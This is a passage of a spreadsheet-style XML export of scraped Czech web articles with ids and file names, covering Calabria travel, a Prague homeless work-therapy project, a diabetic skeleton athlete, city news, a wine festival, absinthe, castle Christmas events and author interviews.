    <t>Kalábrie : Skrytý klenot Itálie , který musíte objevit Kalábrie , špička italské boty, je regionem, který dosud zůstává mnoha turisty opomíjen. Přitom právě zde najdete to pravé italské kouzlo – klidné pláže, malebná městečka, bohatou historii a autentickou kuchyni. Před týdnem Pokud hledáte dovolenou daleko od přeplněných turistických míst, Kalábrie je ideální destinací pro vás. Jak do Kalábrie ? Nejjižnější italský region můžete pokořit autem i letecky. Ve vlastním voze to bude pravda cesta dlouhá, avšak projedete tak Itálii skrz na skrz. Pokud zvolíte leteckou dopravu, můžete přiletět na jedno ze dvou velkých letišť. S největší pravděpodobností to bude Lamezia Terme International Airport. Jde o největší a nejrušnější letiště v Kalábrii . Nachází se v blízkosti města Lamezia Terme a je dobře napojeno na ostatní části regionu. Zde přistávají pravidelné lety z mnoha evropských měst, zejména v letní sezóně. Druhou možností je Reggio Calabria Airport, které se nachází v blízkosti stejnojmenného města. Přistávají tu převážně vnitrostátní lety, ale i lety z některých evropských destinací. Kdy do Kalábrie ? Kalábrie patří mezi nejteplejší regiony Itálie . Chcete-li si tu užít dovolenou včetně koupání v moři, pak se sem vydejte od května do ří jna. Konec roku je tu ve znamení průměrných teplot mezi 18 až 20 °C. Začátek roku je vždy nejchladnější, okolo 14 °C, a v dubnu už můžete očekávat krásných průměrných 24 °C. Proč do Kalábrie ? Nádherná příroda, historie na každém kroku, gastronomick é zážitky, klid a ryzí Itálie . Přesně taková je dovolená v Kalábrii . Špička boty se pyšní neuvěřitelným přírodním bohatstvím. Objevíte tady desítky kilometrů dlouh é písečn é pláže s tyrkysovým mořem, skalnaté útesy i malebné zátoky. Kromě pláží nabízí Kalábrie i ná dhern é hory. Národní parky Aspromonte a Sila jsou rájem pro turisty, cyklisty a milovníky přírody. Tato oblast na jihu Itálie má také bohatou historii, která se odráží v mnoha historický ch městech a památkách. Reggio Calabria bylo významným centrem starověkého Řecka a dodnes se zde nachází muzeum Magna Grecia s unikátními nálezy. Gerace a Scilla jsou středověká městečka s úzkými uličkam i, nádhernými kostely a pevnostmi, které nabízejí pohled do minulosti. Tropea a Capo Vaticano jsou právem považovány za perly tyrh é nsk ého pobřeží. A kalábrijská kuchyně? Tu si prostě zamilujete! Je známá svou jednoduchostí a použitím čerstvých místních surovin. Ochutnejte pikantní salám nduja, domácí těstoviny fileja s ragú, nebo vynikajícího mečouna. Nezapomeňte ani na místní vína a dezerty, jako je například gelato nebo cannoli. Kalábrie je skrytý klenot Itálie , který vás okouzlí svou krá sou, historií a autentickou atmosf é rou. Budete mít pocit, jako by se tu zastavil čas. Místní lidé jsou přátelští a pohostinní, rádi se s vámi podělí o své zvyky i tradice. Pokud hledáte klidné místo, kde můžete hodit shon každodenního života za hlavu, je Kalábrie pro vás ideální volbou. Autor: Eva Mizerová Autor person Eva Mizerová Rubrika transition_slide CESTOVÁNÍ</t>
  </si>
  <si>
    <t>1960</t>
  </si>
  <si>
    <t>500000</t>
  </si>
  <si>
    <t>20241101_299_3243240043_23bb3389a4f3a1bb8fa9.html</t>
  </si>
  <si>
    <t>23bb3389a4f3a1bb8fa9</t>
  </si>
  <si>
    <t>Pracovní terapie lidí bez domova na území MČ Praha 4</t>
  </si>
  <si>
    <t>Pracovní terapie lidí bez domova na území MČ Praha 4 Pražská pobočka Naděje realizuje již několik let na území MČ Praha 4 projekt „Pracovní terapie lidí bez domova“, kdy jedenkrát týdně zajišťuje se dvanácti klienty úklid veřejných prostranství. Místa úklidu určuje objednatel, tedy ÚMČ Praha 4, stejně tak i zapojené klienty, kteří spolupracují se sociálními kurátory pro dospělé ÚMČ Praha 4, případně se do projektu zařazují klienti Naděje. Jednou z lokalit, kde letos probíhá úklid, je okolo Domova na půl cesty Maják, jehož farářka Eva Mikulecká krátce zhodnotila, jaký vnímá přínos tohoto projektu: „Klienti neziskové organizace Naděje svými úklidy výrazně zlepšili stav ulice U Michelského mlýna , která je, ač stranou od hlavní michelské komunikace, velmi využívaná k procházkám, pejskaři, rekreačními běžci a cyklisty. Zároveň velmi oceňujeme společenskou prospěšnost zaměstnávání osob bez domova, neboť jsme také neziskovou organizací, která pracuje se sociálně znevýhodněnými mladými lidmi. Byli bychom rádi, kdyby mohli v této činnosti pokračovat." Účelem projektu není nabízet zapojeným osobám výkon práce na dobu neurčitou, nýbrž se zapojenými osobami pracovat na změně jejich přístupu k samotnému výkonu práce, pravidelnosti, dochvilnosti, pečlivosti a zodpovědnosti s cílem po určité době (v řádu měsíců) vrátit je na pracovní trh. V řadě případů zapojení do projektu lidem bez domova napomohlo natolik, že nyní vykonávají pracovní činnost u různých zaměstnavatelů v různé škále oblastí – například v úklidové, bezpečnostní, stěhovací, v logistice, obchodě či v gastru. Dostat se z ulice a začít pracovat Typickým příkladem člověka, kterému projekt pomáhá, je paní Věra (34). V osmnácti letech a po rozpadu manželství rodičů odešla z domova s touhou najít si někde práci. Plán jí však nevyšel, a nakonec skončila na ulici. Našla si přítele, se kterým přespávala ve stanu, namísto práce se evidovala jako uchazečka o zaměstnání, a jediným jejím příjmem se stala dávka hmotné nouze. Přítel pro ni byl důležitější než ona sama a ocitla se v kolotoči alkoholu i drog. Vše skončilo těhotenstvím a ubytováním v azylovém domě, později v sociálním bytě. Ovšem po určité době se opět vrátila na ulici… Její zapojení do projektu pracovní terapie bylo jednoznačně postaveno na opětovném získání sebedůvěry, ověření si, že je schopná pravidelného výkonu pracovní činnosti a že má zájem znovu zahájit proces opuštění života „na ulici“. Zdali se uvedené zdaří, ukáže následující období. „Věřím, že zapojení do projektu, tedy povinnost, pravidelnost, smysluplnost, motivace spojená s odměnou i abstinencí, je důležitým prvkem nejen v tomto případě, ale i u dalších lidí bez domova, kteří se rozhodli či rozhodnou aktivně řešit svoji tíživou sociální situaci,“ dodává Radek Lacko ( ANO 2011), radní Prahy 4 pro oblast sociální a zdravotní. Pracovní terapii nelze vnímat jako náhradu za standardní pracovní činnost či brigádu. Autor: (red)</t>
  </si>
  <si>
    <t>150100</t>
  </si>
  <si>
    <t>20241101_3_3362716371_66b8dadae9fdfd9b61d6.html</t>
  </si>
  <si>
    <t>66b8dadae9fdfd9b61d6</t>
  </si>
  <si>
    <t>U českého lva</t>
  </si>
  <si>
    <t>U českého lva místní názvy, Úvaly Reklama z 20. let vystihuje vše: „ Doporučujeme hotel U ČESKÉHO LVA na Palackého náměstí číslo 9, telefon číslo 9. Pěkné čisté pokoje. Výborná domácí kuchyně podává v každé denní době studené a teplé pokrmy. Dobře vyleželá piva českobrodská (obyčejné, ležák, granát). V letní sezoně plzeňský prazdroj. Kuželník, kulečník, piano, šachy a tenisové hřiště. Obsluha vzorná, ceny mírné. O hojnou přízeň prosím J. Chroust, majetník.“ V 80. letech byl zbourán a část pozemku byla využita pro přístavbu školy. „ U českého lva …“ Foto: archiv Jiřího Štorka na mapě místo 35 Vyhledávání Autor: redakce Rubrika transition_slide úvalská wiki</t>
  </si>
  <si>
    <t>224</t>
  </si>
  <si>
    <t>160</t>
  </si>
  <si>
    <t>20241101_30_3249316630_0580b8798855ffbbd062.html</t>
  </si>
  <si>
    <t>0580b8798855ffbbd062</t>
  </si>
  <si>
    <t>Inzulin potřebuje i desetkrát denně. Česká skeletonistka popisuje boj s cukrovkou</t>
  </si>
  <si>
    <t>Inzulin potřebuje i desetkrát denně. Česká skeletonistka popisuje boj s cukrovkou Jaroslav Pešta 1. 11. 2024 20:16 Skeletonistka Anna Fernstädtová se připravuje na svoji třetí kompletní sezonu poté, co jí lékaři v roce 2022 diagnostikovali diabetes prvního typu. Závodnice chce navázat na řadu úspěšných vystoupení na mezinárodní scéně a probojovat se na olympiádu v roce 2026 v Itálii . "Je to náročné, ale u sportu chci zůstat," prohlásila na úvod rozhovoru pro on-line deník Aktuálně.cz. Česká skeletonistka Anna Fernstädtová na ZOH 2022 v Pekingu | Foto: Reuters Jak často potřebujete inzulin? Třikrát denně při jídle, dvakrát při tréninku a jednu dávku na noc. Čili šestkrát, ale když jím třeba pětkrát nebo při náročnější přípravě, tak třeba i desetkrát. S cukrovkou souvisí i dietní strava. Už jsem si na ni zvykla. Smažené řízky, omáčky, pizza, pečivo a řada dalších jinak běžných jídel v mém jídelníčku chybí. Moc mi chybějí sladkosti, kterým jen zcela výjimečně podlehnu. Jinak všechno, co jím, mám pod kontrolou a informuji o tom svou lékařku. Jak řešíte stravování na zahraničních sportovních akcích? Už vím, že třeba v Alžírsku budu mít jinou nabídku jídel než ve Francii nebo dokonce v Číně , Koreji či Spojených státech . Takže nejčastěji si vše potřebné kupuji. Hlavně snídani, ale i oběd či večeři si často připravuji sama. Nebo abych si nemusela píchat inzulin, tak šest až sedm hodin nejím, ale pak mi chybí síly. Co je základem vašeho jídelníčku? Především zelenina, ovoce, vajíčka, ovesné vločky a tvaroh. V každém případě si výrazně zredukovanou stravu pozorně hlídám. Jak náročné je pro vás při zámořských cestách časový posun? Hraje nemalou roli. Nejvíc mi vadí, když kvůli němu někdy v noci nespím. Proto při dalekých cestách nutně potřebuji aklimatizaci, než si inzulin a vůbec celé moje tělo zvyknou na úplně jiný čas. To trvá tři až pět dní. Jak prožíváte dobu před startem závodu? Před každým závodem myslím na to, abych ho dobře zvládla. Zároveň však na to, abych nejela s vysokým cukrem, ale ani s nízkým. Všechno je v tu chvíli 50 na 50, tedy bez stoprocentního soustředění na blížící se jízdu. Snažím se být klidná, protože dobře vím, že nervozita ovlivňuje hladinu cukru. A poté, když usednete do skeletonu? Tam už je to při plném soustředění na jízdu lepší. Po četných zkušenostech to platí hlavně v závodech Světového poháru. Ale třeba na mistrovství světa nebo na olympiádě moje nervy doslova pochodují a musím pak přistoupit k hlubokému a opakovanému dýchání. Ledeckou stíhají dopingoví komisaři. Opila se vodou, kocovinu z alkoholu nikdy neměla Už jste někdy musela start do ledového koryta odmítnout? Když mám při tréninku cukr v nepořádku, tak jízdu odložím nebo zruším. Ale závody jsem zatím absolvovala přesně podle stanoveného programu všechny. S čím jdete do nové sezony? Během letní přípravy s menším pohybem a bez nervozity šlo všechno dobře. Teď jsem zvědavá, jak zvládnu dost náročnou sezonu. Jedno je však pro mě jasné už dnes: cukrovka je hendikep, se kterým se nedá nic dělat a až do konce své sportovní kariéry s ním budu bojovat. reklama Autor: Jaroslav Pešta Autor Jaroslav Pešta Rubrika transition_slide Sport</t>
  </si>
  <si>
    <t>101270</t>
  </si>
  <si>
    <t>73670</t>
  </si>
  <si>
    <t>20241101_300_3243240821_b312319764e3cc2b3d41.html</t>
  </si>
  <si>
    <t>b312319764e3cc2b3d41</t>
  </si>
  <si>
    <t>Zprávy z hlavního města</t>
  </si>
  <si>
    <t>Zprávy z hlavního města Centrum perinatální duševní péče začalo pomáhat v Praze 4 Specializované zařízení, které by nabízelo komplexní podporu v oblasti duševního zdraví v období těhotenství a po porodu, dosud v Praze a vlastně i v celé České republice chybělo. To se změnilo. V Poliklinice na Zeleném pruhu v Praze 4 hlavní město zahájilo provoz unikátního Centra perinatální duševní péče. S příznaky duševních onemocnění se v Česku ročně potýká až 40 tisíc žen v těhotenství či po porodu a až tři čtvrtiny z nich nevyhledají odbornou pomoc. Jedním z důvodů může být i fakt, že u nás chybělo podobné zařízení, které by se na tuto oblast komplexně specializovalo. Nové centrum má v plánu rozšířit v budoucnu nabídku péče také o služby denního stacionáře pro těhotné nebo ženy s malými dětmi a rovněž rozšířit tým o sociální pracovníky či adiktologickou poradnu pro těhotné. Plánem je dosáhnout toho, aby v Praze v budoucnu existovalo místo, kde mohou být ženy hospitalizované (pokud to potřebují) i se svými dětmi tak, aby nedocházelo k separaci dítěte od matky. Péče v centru je plně hrazena ze zdravotního pojištění. (red) Projekt příměstského parku Soutok získal významnou zahraniční cenu Projekt Soutok, podle něhož má na jižní hranici Prahy vzniknout příměstský park, získal minulý měsíc v britském Birminghamu významné mezinárodní ocenění WMNP Awards. Je to velký úspěch, soutěže se zúčastnily týmy z celého světa, do finále jich postoupilo sedm. Říční niva na soutoku Berounky a Vltavy má rozlohu přes 1300 hektarů, území je rozděleno mezi pět městských částí a město Černošice . Střetává se zde spousta různých zájmů, jejichž výsledkem bývají nekoordinované zásahy ničící krajinu. Institut plánování a rozvoje hlavního města Prahy (IPR) proto navrhl řešení v podobě příměstského parku nazvaného jednoduše Soutok. Budoucí podoba příměstského parku přispěje k biodiverzitě tohoto území, zajistí lepší zadržování vody v krajině prostřednictvím revitalizaci břehů obou řek a také zajistí k přírodě šetrnou protipovodňovou ochranu obcí v jeho sousedství. Do přípravy projektu IPR zapojil veřejnost, protože lidé do projektů vnášejí autentickou znalost prostředí a jeho problémů. (red) Zákaz nočních turistických tahů po hospodách s průvodcem Pražští radní schválili novelu tržního řádu, která omezí organizované tahy turistů od hospody k hospodě s průvodcem. Ty ruší noční klid především v centru Prahy . V době nočního klidu od 22 hodin večer do 6 hodin ráno bude v Praze zakázáno pochůzkové poskytování služeb. Tržní řád hlavní město novelizovalo z podnětu městské části Praha 1 , která kvůli opileckým tahům čelí řadě negativních dopadů na veřejný prostor, ekonomiku a společenské vztahy. Větší skupiny účastníků produkují více odpadků a kladou vyšší nároky na zajištění bezpečnosti, což neúměrně zatěžuje obecní infrastrukturu, komunální čisticí služby a městskou policii. Alkoholový turismus navíc významným způsobem poškozuje image Prahy jako kultivované destinace. Rušivé chování spojené s nočními tahy Prahou může mít negativní dopad na vnímání města turisty, potenciálními investory a samotnými občany, a v dlouhodobém horizontu tak může být nepříznivě ovlivněn celkový ekonomický rozvoj dané lokality. Vymáhání zákazu bude mít na starosti městská policie. (red)</t>
  </si>
  <si>
    <t>20241101_301_3243092781_6ac85daf435587ee8695.html</t>
  </si>
  <si>
    <t>6ac85daf435587ee8695</t>
  </si>
  <si>
    <t>Festival otevřených sklepů – za vinaři z Podluží 2024 – Kudy z nudy</t>
  </si>
  <si>
    <t>Festival otevřených sklepů – za vinaři z Podluží 2024 – Kudy z nudy Tato akce již proběhla a není tedy aktuální. Prohlédněte si aktuální akce v okolí této již neaktuální akce, prozkoumejte aktuální akce v regionu Jihomoravský kraj nebo navštivte Gastronomické akce v celé ČR . Již 34. Festival otevřených sklepů se uskuteční o víkendu 2. a 3. listopadu ve třech vinařských obcích mezi malovanými sklepy Podluží . Návštěvníky čeká 32 vinařství, které nabídnou ve volné degustaci kolem 370 místních vín. Festival otevřených sklepů odzátkuje láhve v Malovaném kraji – pod žúdrama s lidovými ornamenty, ve sklepech kvelbených starými cihlami i v moderních degustačkách nových vinařství. Víno je tady stejně jako slovácké písničky – veselé, plné lásky, milování, námluv i verbování, prostě jako život sám. A pokud chcete ještě nějakou nápovědu, tak Podluží je královstvím malých vinařů, pinotů, zelených sylvánů, vavřinců, frankovek a samozřejmě – rodištěm odrůdy Cabernet Moravia. Začneme v Moravské Nové Vsi , staví tam vlaky a jako vždy, autobusy vás pak zavezou všude, kam potřebujete, k vinařům, ke gastro stánkům i tam, kde zní cimbálky, békají mužácí a snad i dechovky. Týden před svatým Martinem , dobrým vínem si připijem! Festival se uskuteční v obcích Hrušky, Moravská Nová Ves a Mikulčice , spojených kyvadlovou dopravou. Pro účastníky je degustace ve vstupném, při ochutnávání je jim vstupenkou samotná sklenička. Vše potřebné dostanou na registračním místě v malém sále nově opravené Sokolovny v Moravské Nové Vsi. Otevřeno je v pátek od 15:00 do 20:00 a v sobotu od 8:00 do 15:00. V neděli budou vstupenky a informace pro opozdilce od 10:00 do 12:00 na vinařském dvoře Rodinného vinařství Košut. Sklepy jsou otevřené v sobotu od 10:00 do 21:00 a v neděli od 10:00 do 15:00. V pořadí již 34. Festival otevřených sklepů se uskuteční o víkendu 2. a 3. listopadu 2024 ve třech vinařských obcích mezi malovanými sklepy Podluží .... Mnoho slunečních paprsků už nejspíš čekat nemůžeme. Využít ale lze i pošmourné listopadové počasí a místo dlouhých výletů a procházek si užít... Již tento víkend otevře druhý letošní Festival otevřených sklepů novou vinařskou velkoobec Velké Podlužice. Festival se uskuteční v Moravské Nové Vsi...</t>
  </si>
  <si>
    <t>20241101_302_3243092554_6744f72959e076f84f38.html</t>
  </si>
  <si>
    <t>6744f72959e076f84f38</t>
  </si>
  <si>
    <t>Odepsaný-Osamu Dazai</t>
  </si>
  <si>
    <t>Odepsaný- Osamu Dazai / エレン Nechápu proč ostatní na tuto knihu nadávají, i přesto že mi každá z postav byla bytostně odporná tak musím říct že kniha je dobře napsaná a dobře se čte. Pokud však nemáte rádi depresivní knihy nebo témata jako alkohol , psychické problémy, znásilnění a podobně tak tato kniha určitě nebude zrovna pro vás. Józó, hlavní hrdina románu Odepsaný, vypráví o svém na první pohled běžném a víceméně normálním životě, přestože se sám cítí neschopen porozumět lidským bytostem. Pokusy o smíření se s okolním světem začínají v raném dětství, pokr... více Komentáře (0) Autor: Autoři || Databazeknih.cz</t>
  </si>
  <si>
    <t>66140</t>
  </si>
  <si>
    <t>86970</t>
  </si>
  <si>
    <t>20241101_303_3243092575_71302b88eb37f812d03c.html</t>
  </si>
  <si>
    <t>71302b88eb37f812d03c</t>
  </si>
  <si>
    <t>Všechno, co jste chtěli vědět o absintu, ale báli jste se zeptat</t>
  </si>
  <si>
    <t>Všechno, co jste chtěli vědět o absintu, ale báli jste se zeptat autor: Redakce Nezdrave.cz | 01.11.2024 | Chlast Absinth, ten legendární zelený nápoj, byl po staletí na špici notoricky oblíbených alkoholických nápojů, ačkoliv se mu dlouhou dobu přezdívalo „zelená víla“. Dneska se na něj někteří mladí lidé dívají jako na něco, co pije jen starý kocour ve vintage hospodě, ale pravda je taková, že tenhle silák z bylin se vrací s plnou parádou. Proč? Protože když si chcete užít život na plné pecky, potřebujete alespoň kapku magie ve své sklenici. Fakt, který vás dostane Pojďme vyhodit do vzduchu jeden překvapující fakt: absint obsahuje thujon, sloučeninu, která se nachází v pelyňku. Ten pelyněk se v minulosti považoval za halucinogenní rostlinu, což vedlo k řadě mýtů o absintu jako nápoji pro umělce a proroky. Není to tak dávno, co byl tento alkohol zakázán, což ze všech včerejších hipsterů udělalo superhrdiny nahrávající na retro nástroje s šílenými historkami. Skutečně dokáže vyvolat halucinace? Zatímco nadšenci tvrdí, že po pár skleničkách vidí„zelené víly“, odborníci se přiklánějí k názoru, že spíše jde o efekt kombinace alkoholu a ořezaného rozumu. Když se mísí historie s absintem Takže, jak to s absintem vlastně je? Historie sahá až do 18. století, kdy se na scéně objevily byliny mísící se se spirituálními esencemi a ukázalo se, že lidé, co pili absint, byli častějšími umělci, jako byli Vincent van Gogh a Oscar Wilde . Místo pozdních večerů na Netflixu se tihle kluci houfovali v kavárnách a diskutovali o smyslu života a existenciálním dramatu. Je to jistě lákavé, ale přiznejme si – kdo z nás se teď honí za stejným viděním? Ruku na srdce, dáváte přednost absintu, nebo chudákovi webové verze „Jak se dívám na jednorázové pleny na Instagramu“? A tady na scéně máš i nebezpečného tvora – absintovou louku. Nenechte se zmást touto malebnou kombinací bylin, směs se totiž servíruje se spoustou protichůdných zvěstí a pravidel. V minulosti se nápoj často ředil vodou, kterou nalévali přes lžičku na cukr, což vedlo k tomu, že se z nápoje stával opojný nápoj a ne jen obyčejný alkohol . Když k tomu přidáte trošku nostalgie, cítíte ten neodolatelný kousek historie na rtech? Moderní trendy a okultní víly Dnes se absint stal opět hitem na svých otvíracích akcích barů, kde se poprvé dostává na scénu v moderních variantách. Trendy jako absintové koktejly se odcházející generace nebojí experimentovat s neotřelými kombinacemi, zatímco příznivci nostalgie se rádi vrátí k tradičnímu podávání. A co je důležitější – milovníci nostalgie dostávají šanci znovu prožít svá umělecká období v exkluzivních podnicích oživujících atmosféru opravdových bohemských časů. Konečně, až se o víkendu setkáte s kamarády na nějaké té undergroundové pařbě, třeba si otevřete láhev absintu a nezapomeňte, že se jedná o nápoj s duší a příběhem. Obohaťte své smysly, dejte prostor svým obavám a dodejte si dávku životní síly. Protože když přijde na volbu alkoholu , je to ten pravý čas na trochu lahodného bláznovství a záhad. Nejnovější příspěvky Autor: Redakce Nezdrave.cz</t>
  </si>
  <si>
    <t>20241101_304_3243244067_226fe1efabca50ac88e7.html</t>
  </si>
  <si>
    <t>226fe1efabca50ac88e7</t>
  </si>
  <si>
    <t>Soukromé hrady a zámky nespí a chystají se na Vánoce</t>
  </si>
  <si>
    <t>Soukromé hrady a zámky nespí a chystají se na Vánoce Soukromé hrady a zámky nespí ani po ukončení hlavní návštěvnické sezóny a jejich majitelé, přestože často mají vznešené předky, se neukládají k spánku jako královská dcera, která do pohádek vstoupila jako Šípková Růženka. Motivací jsou pro ně zejména týdny adventu, a tudíž blížící se vánoční svátky, které právě na památkových objektech bývají kouzelné a půvabné. A tak v nadcházejících týdnech by si nikdo neměl nechat návštěvu hradů a zámků ujít. Vždyť právě ty v soukromých rukách patří mezi nejkouzelnější u nás. Hrad a zámek Dolní Kounice | Foto: amhz.cz A co se tam chystá? Třeba na zámku rodiny Kinských dal Borgo Karlova Koruna v Chlumci nad Cidlinou plánují ve dnech 23.11. až 15.12.2024 adventní prohlídky krásně nazdobeného sídla pro školy, školky i širokou veřejnost. Ve dnech 26. až 31. 12.2024 bude možné navštívit i další objekt týchž majitelů a zažít zimní atmosféru na hradě Kost, ukrytém uprostřed lesů a roklí Českého ráje. Na zámku Líšno, který není běžně přístupný, můžete zavítat 2.11.2024 na noční prohlídky a 29.11.2024 tam bude možné společně s majiteli zažít rozsvícení zámeckého stromku. Na zámku Velké Meziříčí, kde sídlí nejen majitelé z rodu Podstatzky-Lichtenstein, ale i městské muzeum, chystají do konce roku (29.11.2024-5.1.2025) výstavu Betlémy a vánoční zvyky. Na zámku a hradě Dolní Kounice společnosti Františka Zoubka během listopadových víkendů vůbec poprvé zpřístupní historické podzemí a na zámku Štáblovice, který vlastní Kamil Kolek, plánují rovněž na listopad tradiční svatomartinské prohlídky s výmluvným názvem Zámkem s číší vína a od začátku adventu až do konce roku tradiční vánoční prohlídky. Jinou cestou se rozhodli jít na zámku v jihočeské Blatné, který je po staletí sídlem rodu Hildprandtů. Připravují tam na všechny čtyři předvánoční víkendy Adventní trhy, a Vánoční trh bude hostit 8. prosince 2024 rovněž zámek Lobkovice, který v majetku rodiny Lobkowiczů. Na dalších památkových objektech bude znít před Vánoci hudba - na zámku Hrádek u Sušice majitele Pavla Lejska adventní koncert pěveckého souboru Faux Pas, zámek rodiny Reiských Vilémov bude 13. prosince hostit vánočně laděný koncert klasicistní hudby z vídeňských salonů v podání violonu a violy a zámek Lažanských Chyše ožije hudbou hned dvakrát - 2. 11.204 tam zazpívá ženský sbor z Prahy a 1.12.2024 Žihelský smíšený sbor. Tradičně bohatý bude v následujících týdnech i program na zámku Colloredo- Mansfeldů v Dobříši . Na koncertech vystoupí žáci místní základní umělecké školy (21.11.2024), anebo Zdeňka Žádníková (30.11.2024), 7.12.2024 proběhne na nádvoří zámku Vánoční trh, na 13.12.2024 se připravuje Vánoční koncert města Dobříš a 21.12.2024 zazní v nádherném Zrcadlovém sále jako vyvrcholení všech adventních akcí Česká mše vánoční J.J.Ryby. Prezident Asociace majitelů hradů a zámků Michal Farník , jinak majitel zámku Neustupov , který je ve funkci teprve několik měsíců, k tomu říká: "Snažíme se maximálně zaujmout širokou veřejnost, a to včetně rodin s dětmi. Proto pořádáme na našich památkových objektech celou řadu akcí i po skončení hlavní návštěvnické sezóny. Věříme, že cestu na soukromé hrady a zámky si díky tomu najde co nejvíce návštěvníků, aby viděli a poznali to nesmírné kulturní dědictví, které se snažíme co nejodpovědněji spravovat." Autor: Zuzana Böhmová Autor: Zuzana Böhmová Autor person Zuzana Böhmová Rubrika transition_slide Domáci</t>
  </si>
  <si>
    <t>897</t>
  </si>
  <si>
    <t>502</t>
  </si>
  <si>
    <t>20241101_305_3243240057_0917e5c2835a2528a7df.html</t>
  </si>
  <si>
    <t>0917e5c2835a2528a7df</t>
  </si>
  <si>
    <t>10 otázek pro Lenku Hatašovou</t>
  </si>
  <si>
    <t>10 otázek pro Lenku Hatašovou Rubrika: PTÁME SE Před jejím objektivem stály nejenom české, ale i zahraniční hvězdy, jako třeba Sophia Loren , Meryl Streep či zpěvačka Cher. Na kontě má řadu úspěšných výstavních projektů a pro Nadaci Archa Chantal právě připravuje další ze svých legendárních kalendářů. Jaká je ale čtenářka? 1. Jakou knihu právě čtete? Knižní rozhovor Erika Taberyho se Zuzanou Čaputovou. Jmenuje se Neztratit se sama sobě a musím přiznat, že hned v jejím úvodu mi ukáplo pár slz – a sice když jsem četla, s čím vším se bývalá slovenská prezidentka musela potýkat v období před svou inaugurací. 2. Je pro vás lepší papírové vydání, nebo čtečka? Pro mě jsou ideální audioknihy, momentálně poslouchám načtenou biografii Elona Muska a Žítkovské bohyně od Kateřiny Tučkové . Postprodukcí mých fotografií strávím dlouhé hodiny u počítače, a v jednom kuse při tom něco poslouchám, buď audioknihy, nebo rozhlasové hry režisérky a výtvarnice Bely Schenkové . Čtečku jsem nikdy neměla v ruce, ale pátrám po ní! 3. S jakou literární postavou byste šla na víno ? Na víno asi ne, protože alkohol nepiju, ale na kávu (nebo v jeho případě spíš na čaj) bych asi ráda pozvala fotografa a mystika Františka Drtikola . I když nejde úplně o literární postavu, on jí pro mě momentálně je – mám totiž rozečtenou další knihu, a to Dějiny světla od Jana Němce , což je román právě o Drtikolovi . 4. U které knihy jste se smála nahlas? To si vůbec nevzpomínám. Ale můžu odpovědět obloukem a říct, se kterým spisovatelem jsem se naposledy nahlas hodně zasmála – s Patrikem Hartlem ! Vždy jednou za čas mu pořizuji portrétní fotografie a myslím, že je všeobecně známé, jak je Patrikův smích nakažlivý... Díky své profesi se vůbec hodně nasměju. Momentálně s kolegyní fotografkou Monikou Navrátilovou připravujeme pro Nadaci Archa Chantal zbrusu nový kalendář Proměny Fantazie 25, a kdo tento legendární projekt zná, ví, o co jde. Představujeme známé osobnosti v nezvyklých situacích a obrazech, které tvoříme pomocí umělé inteligence, a věřte, že je u toho zábavy víc než dost. 5. Oblíbený citát z knihy? Ještě chvíli zůstanu u mých rozečtených Dějin světla: „Jmenuji se Drtikol . Drtil jsem kola, která mě svírala. Jsem fotograf. Fotografoval jsem světlem. Píši lidem do duší světlem poznání.“ Hodně se s ním ztotožňuji. 6. Jakou knihu byste si vzala na pustý ostrov? Něco z oblasti čínské medicíny nebo Nekonečnou sílu od Anthonyho Robbinse, kde může čtenář objevit i spoustu rad, které by mu právě pustý ostrov mohly pomoci přežít. A pak Cestu od Brandon Bays, která je autorkou pro mě revoluční techniky – jak se zbavit potlačených toxických emocí. 7. Kde knihy nejčastěji nakupujete? Spíš v antikvariátech, nebo v online bazarech. I když nová kniha krásně voní, nutně novou mít nemusím – pokud se tedy zrovna nejedná o nějaký hit nebo klenot, kterého se po přečtení nikdo nechce zbavit. Občas si knihy i půjčím, třeba od maminčina přítele Milana, který je velký čtenář a má fantastickou knihovnu nejen svých publikací. Je totiž vědec a autor v oboru analytické chemie, ale také fanoušek fotografie, což činí jeho sbírku knih pro mě ještě zajímavější. 8. Co děláte s knihami, které už nechcete? Líbí se mi systém Knihobota, takže je většinou vozím tam. Ne vše ale vezmou, takže zbytek pak většinou vyskládám v nějaké knihobudce. Knihy také ráda věnuji své sestřence Magdě, pro kterou je četba velkou vášní a inspirací, protože ona sama je stejně jako její otec a můj strýc Milda vypravěčkou neskutečných příběhů, které by stálo za to jednou takříkajíc „hodit na papír“. 9. Proč je podle vás dobré číst knihy? Záleží na tom, co čtenář od četby očekává – jestli ho baví únik do jiných světů, žít životy fiktivních postav anebo vzdělávání. Já čtu spíš z toho druhého důvodu. A pak je tu slovní zásoba a taky fantazie. Že je četba tříbí, je prostě jasná věc! 10. Jakého spisovatele byste si vybrala, aby napsal váš životní příběh? Pokud bych se toho neujala sama, tak by to musel být někdo, jehož tvorbu znám, a navíc k němu mám důvěru, nejlépe prohloubenou během fotografování skrze můj objektiv – to jsou pro mě vždy zázračné chvíle propojení s druhým člověkem. Napadá mě výborná spisovatelka a novinářka Lucie Šilhová, se kterou se dobře znám a jejíž tvorba se mi moc líbí. Autor: připravila: Martina Vlčková foto: Monika Navrátilová Autor person Martina Vlčková Rubrika transition_slide PTÁME SE</t>
  </si>
  <si>
    <t>105000</t>
  </si>
  <si>
    <t>20241101_306_3243231161_5f8b2e82ad602771cbd3.html</t>
  </si>
  <si>
    <t>5f8b2e82ad602771cbd3</t>
  </si>
  <si>
    <t>Některé případy člověk z hlavy nedostane</t>
  </si>
  <si>
    <t>Některé případy člověk z hlavy nedostane Rubrika: ROZHOVOR Přes 20 let coby člen bratislavské mordparty řešil nejsložitější a nejdrsnější případy na Slovensku , se stejnou vervou se pak vrhl na psaní detektivek. Václav Neuer už má sice na kontě deset knih, ale k českým čtenářům se v těchto dnech dostává teprve jeho prvotina Krkavčí soud. Drsné krimi se sympatickým inspektorem Ledeckým se u našich sousedů stalo obrovským hitem a my si nemohli nechat ujít příležitost autora vyzpovídat! Na obálce knihy se skví velký nápis Skutečné zločiny, hned na začátku ale píšete, že je to všechno smyšlené. Tak jak to tedy je? Náměty čerpám ze skutečných případů, v drtivé většině dokonce z těch, na jejichž vyšetřování jsem se osobně podílel. Ale je to jenom námět. Příběh, který čtenářům předkládám, záměrně upravuju. Jednak z úcty k obětem a pozůstalým, ale především proto, aby to čtenáře bavilo číst. To je pro mě nejdůležitější – aby se čtenář nenudil. Vždy se ale snažím zachovat co největší míru autenticity. Přes 20 let jste pracoval u policie, že? Je pro vás důležité ukázat, jak to do opravdy funguje? Ano, přesně řečeno jsem tam pracoval 23 let. Od té doby, co jsem začal psát, jsem si předsevzal, že se pokusím zachytit život a práci policistů co nejvíc realisticky. Čili i včetně určité míry byrokracie, která k té práci patří. Pro mě osobně to je důležité, ale na druhou stranu si nemyslím, že na tom stojí nebo padá, jestli je detektivka dobrá. Existuje naopak něco, 